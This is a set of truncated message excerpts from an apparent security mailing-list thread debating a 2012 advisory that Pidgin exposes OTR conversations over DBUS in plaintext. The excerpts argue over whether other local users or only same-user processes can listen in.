-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jann Horn wrote:
> 2012/2/25 Dimitris Glynos :
>> Pidgin transmits OTR (off-the-record) conversations over DBUS in
>> plaintext. This makes it possible for attackers that have gained
>> user-level access on a host, to listen in on private conversat
On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
> I think you didn't understood the content of the advisory.
> If there are 10 non-root users in an Ubuntu machine for example,
> if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10
> can see what user 1 pidgin conversation.
Th
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri wrote:
> On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
>> I think you didn't understood the content of the advisory.
>> If there are 10 non-root users in an Ubuntu machine for example,
>> if user 1 is using pidgin with OTR compiled with DBUS, then use
On 02/27/2012 11:23 PM, devn...@vonage.com wrote:
>
> I believe that clarification is in order.
Indeed it is. The original post mentions a same-user attack
vector which is very misleading as to what the real problem here is.
And it boils down to this:
Once a process sends private info over DBUS
On 02/28/2012 12:14 AM, Dimitris Glynos wrote:
> On 02/27/2012 11:23 PM, devn...@vonage.com wrote:
>>
>> I believe that clarification is in order.
>
> Indeed it is. The original post mentions a same-user attack
> vector which is very misleading as to what the real problem here is.
>
> And it boil
